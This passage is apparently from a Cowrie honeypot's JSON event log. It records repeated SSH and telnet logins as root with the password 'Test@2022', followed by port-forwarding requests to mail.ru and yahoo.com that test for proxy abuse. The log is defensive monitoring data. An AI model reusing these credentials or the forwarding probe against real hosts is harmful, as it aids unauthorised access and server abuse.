{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44378,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f9507c19dfc","protocol":"telnet","message":"New connection: 212.227.235.229:44378 (1.2.3.4:23) [session: 7f9507c19dfc]","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.210542Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.260967Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16396,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16396","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.312085Z","session":"587b82d4dc1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.362566Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":15374,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15374","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.504540Z","session":"587b82d4dc1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.554909Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17272,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17272","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.696712Z","session":"587b82d4dc1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.746931Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.797951Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50251,"dst_ip":"1.2.3.4","dst_port":22,"session":"4761bc86148e","protocol":"ssh","message":"New connection: 77.83.207.83:50251 (1.2.3.4:22) [session: 4761bc86148e]","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.846362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.847215Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.897508Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.146960Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19698,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19698","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.198399Z","session":"4761bc86148e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.249003Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":25461,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25461","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.392292Z","session":"4761bc86148e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.442258Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24939,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24939","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.584416Z","session":"4761bc86148e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.634485Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.685798Z","src_ip":"77.83.207.83","session":"4761bc86148e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50324,"dst_ip":"1.2.3.4","dst_port":22,"session":"23d08c51eb55","protocol":"ssh","message":"New connection: 77.83.207.83:50324 (1.2.3.4:22) [session: 23d08c51eb55]","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.737880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.738688Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:30.791550Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.053649Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18927,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:18927","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.106979Z","session":"23d08c51eb55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.159420Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22763,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22763","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.306791Z","session":"23d08c51eb55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.359206Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26903,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26903","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.506788Z","session":"23d08c51eb55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.559210Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.612909Z","src_ip":"77.83.207.83","session":"23d08c51eb55"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50436,"dst_ip":"1.2.3.4","dst_port":22,"session":"34d28e59e9bf","protocol":"ssh","message":"New connection: 77.83.207.83:50436 (1.2.3.4:22) [session: 34d28e59e9bf]","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.662000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.663106Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.713662Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:31.964301Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1850,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1850","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.015743Z","session":"34d28e59e9bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.066172Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":1041,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1041","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.208788Z","session":"34d28e59e9bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.259133Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":8904,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8904","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.404620Z","session":"34d28e59e9bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.454829Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.505991Z","src_ip":"77.83.207.83","session":"34d28e59e9bf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50537,"dst_ip":"1.2.3.4","dst_port":22,"session":"57e77202b080","protocol":"ssh","message":"New connection: 77.83.207.83:50537 (1.2.3.4:22) [session: 57e77202b080]","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.554159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.554813Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.604627Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.852347Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12269,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12269","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.903542Z","session":"57e77202b080"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:32.953264Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":50515,"dst_ip":"1.2.3.4","dst_port":23,"session":"85053ac9f018","protocol":"telnet","message":"New connection: 182.119.206.115:50515 (1.2.3.4:23) [session: 85053ac9f018]","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.011036Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":27970,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27970","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.095928Z","session":"57e77202b080"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.145687Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":24793,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24793","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.287972Z","session":"57e77202b080"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.337765Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.388736Z","src_ip":"77.83.207.83","session":"57e77202b080"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50626,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab8aab84bbe4","protocol":"ssh","message":"New connection: 77.83.207.83:50626 (1.2.3.4:22) [session: ab8aab84bbe4]","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.438137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.448402Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sh